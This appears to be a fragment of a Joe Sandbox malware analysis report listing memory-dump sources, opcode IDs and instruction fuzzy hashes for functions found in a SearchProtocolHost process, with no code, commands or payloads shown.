                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                      • Instruction ID: a657d73e17272b21381c45cb94c6ff116332f187d8bccf9fa0aa1285a07db331
                                                                                      • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                      • Instruction Fuzzy Hash: 74E0EC39950B849FDF22DF99CA44F5AF7F6BB84B00F190858A5089F6A0D624E900CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                      • Instruction ID: af1daf818e749ebaeb6bcc75b04db37419a2fcf914c278d461bd40419690552c
                                                                                      • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                      • Instruction Fuzzy Hash: 84D0223220203493CB38BB456914F63B9059B80A50F0A002E380A83800C0008C43D6E0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                      • Instruction ID: 470beb7f8c4a4583e738013755337c81e24c4679d7bf5358b6bd61b3bd024b6f
                                                                                      • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                      • Instruction Fuzzy Hash: 67D0123B1D064CBBDB11DF65DC01F957BA9E794B60F044120B5088B5A0CA3AE950D984
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                      • Instruction ID: f2ce49110ce9bbd1498a73927a3543a08918a31a4a4766cba8b73fe6ef3d341f
                                                                                      • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                      • Instruction Fuzzy Hash: 86D0E935352D80DFD61ACB1DC995B5673A8BB44B44F8545D0E901CB762D66CD944CA04
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                      • Instruction ID: b0c6a98f9fce0b10ba896cc7b1feeb2ad8a5fa6594416a13dcc7ed2ee7c9ce37
                                                                                      • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                      • Instruction Fuzzy Hash: 87C01236150644AFD711DE98CD01F0177A9E798B00F000021F2044B570C531E810DA44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                      • Instruction ID: 36e38997ba4606a2b1365e54e4f128ec57c3700642153edbe8e38d0cc0c0ca4a
                                                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                      • Instruction Fuzzy Hash: C6D0123610024CEFCB01DF40C854E9A773AFFC8710F108019FD190B6108A31ED62DA50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                      • Instruction ID: 97dd089cec78426186ed60436fb4947f4819e76aa1d2bc001c5b44d67bab4ead
                                                                                      • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                      • Instruction Fuzzy Hash: 7CC08C7C1417806AFB2ADB00CD14B2A76B8AB08A05F8C029CAA041E4A1C76AE8418618
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                      • Instruction ID: 4e6a8d2dea1cbff4afea227079e9a3d20cc6e7b943925a16022a57351ca52014
                                                                                      • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                      • Instruction Fuzzy Hash: 2AC00239741A408BDE15CA19C688A1977E8B744740F1508D0E8058BA21D624E800CA10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f315ab7f1b515c3519c2a9bdb9bda7edc3c59ffc3faa32272374660ebaff369a
                                                                                      • Instruction ID: 19bafa4ca939a1615a439758e0a2bc242d33c24ed18187e58d16c7571c030f71
                                                                                      • Opcode Fuzzy Hash: f315ab7f1b515c3519c2a9bdb9bda7edc3c59ffc3faa32272374660ebaff369a
                                                                                      • Instruction Fuzzy Hash: DB90022161500812E540B2585518706001587D4601F51D525A4014554DC7698A5576A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d7f807a8af80f7292727033ff69c8ad7f3da7fd8cac8b9def63bbe73547a82b
                                                                                      • Instruction ID: aee4a73251ef065f9f33de27d990da0675826a55f4581a5d17b93de3052afdd5
                                                                                      • Opcode Fuzzy Hash: 6d7f807a8af80f7292727033ff69c8ad7f3da7fd8cac8b9def63bbe73547a82b
                                                                                      • Instruction Fuzzy Hash: 3890023121100C12E504A2584904686000587D4701F51C525AA014655ED77588917132
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 814c405332c3e07c9c61bee33622c83f336d529dda53d8a77d686cdd7d468b7f
                                                                                      • Instruction ID: 6219aba5a699cbeb199be84fcb40dabedd9e3be981561a867b1d6f3c8074aee6
                                                                                      • Opcode Fuzzy Hash: 814c405332c3e07c9c61bee33622c83f336d529dda53d8a77d686cdd7d468b7f
                                                                                      • Instruction Fuzzy Hash: 6C9002A1211144A29900E3588504B0A450587E4601B51C52AE5044560CC6358851B136
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e04bb8ccef25fb2fd92242043c3125f3cd36c06ba690d8f7fadf3a23c3f0444
                                                                                      • Instruction ID: fa03aba3c4c53c59d35d0fad189de08087cd6a1134ee46a33b9a6147e00f334d
                                                                                      • Opcode Fuzzy Hash: 3e04bb8ccef25fb2fd92242043c3125f3cd36c06ba690d8f7fadf3a23c3f0444
                                                                                      • Instruction Fuzzy Hash: F190022121144852E540A3584904B0F410587E5602F91C52DA8146554CCA2588557722
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$@
                                                                                      • API String ID: 0-1194432280
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%